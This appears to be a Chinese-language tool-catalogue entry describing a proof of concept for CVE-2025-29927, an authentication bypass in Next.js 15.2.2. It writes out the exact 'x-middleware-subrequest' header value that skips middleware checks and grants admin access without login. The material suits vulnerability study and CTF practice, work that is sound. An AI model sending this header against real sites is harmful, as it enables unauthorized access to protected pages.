黑客、渗透测试和网络安全工具,武装您的安全武器库!
CVE-2025-29927 漏洞的一个基础概念验证(PoC),该漏洞允许绕过中间件脚本。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
CVE-2025-29927 漏洞的一个基础概念验证(PoC),可绕过中间件脚本。 详情:阅读原文
该复现基于 Next.js 15.2.2 版本。 该漏洞允许用户绕过包含验证逻辑的中间件脚本,从而无需登录即可访问管理页面。 只需在请求中添加请求头 x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware 即可实现。
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
此漏洞可用作 CTF 挑战题。